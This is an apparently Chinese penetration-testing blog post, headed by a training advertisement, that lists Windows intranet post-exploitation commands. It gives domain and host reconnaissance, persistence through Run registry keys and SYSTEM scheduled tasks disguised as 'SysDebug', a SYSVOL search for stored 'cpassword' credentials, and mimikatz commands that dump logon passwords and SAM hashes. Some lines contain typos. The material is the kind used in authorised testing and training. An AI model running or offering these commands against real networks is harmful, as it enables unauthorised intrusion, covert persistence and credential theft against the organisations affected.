内网渗透的一些命令

2020年04月04日 12:43:56 作者:必火 阅读数:185462
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:18622800700(手机同微信)。全国诚招招生代理,最低2000元起

获取服务器相关信息

shell wmic OS get Caption,CSDVersion,OSArchitecture,Versionb

查看当前机器网络环境

shell ipconfig /all && netstat -ano && arp-a

查看权限在线用户

shell whoami /user && query user

查看进程以及开启的服务

shell tasklist && net start

确定当前 xxxx.com 域内所有域管理用户列表及域控位置

shell net group "domain controllers" /domain

shell net group "domain admins" /domain

抓取当前机器已安装软件的完整列表

shell wmic product get name,version

加入注册表启动

#REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
#REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SysDebug" /t REG_SZ /F /D "c:\windows\debug\SysDebug.exe"
#REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SysDebug" /f

加入计划任务

#schtasks /create /RLHIGHEST /F /tn "SysDebug" /tr "c:\windows\debug\Sysbug.exe" /sc DAULY /mo 1 /ST 10:05 /RU SYSTEM
#schtasks /query | findstr "SysDebug"
#schtasks /run /tn "SysDebug"
#schtasks /delete /F /tn "SysDebug"
#schtasks /tn "SysDebug" /query /fo list /v

低权限计划任务定时执行

#schtasks /create /F /tn "SysDebug" /tr "D:\用户文档\xxx\Contacts\SysDebug.exe" /sc DAILY /mo l /ST 10:05
#schtasks /query | findstr "SysDebug"
#schtasks /run /tn "SysDebug"
#schtasks /delete /F /tn "SysDebug"
#schtasks /tn "SysDebug" /query /fo list /v


查看域信息

shell net time /domain
shell net view ad
shell dir \\ad\NETLOGON
shell type \\ad\NETLOGON\chapwd.cmd

查看搜索文件内容

shell findstr /c:"userName=" /c:"cpassword=" /si \\ad\sysvo\xxx.com\policies\*.xml

获取密码 hash值

mimikatz !privilege::debug
mimikatz !sekurlsa::logonpasswords
mimikatz !privilege::debug
mimikatz !token::elevate
mimikatz !lsadump::sam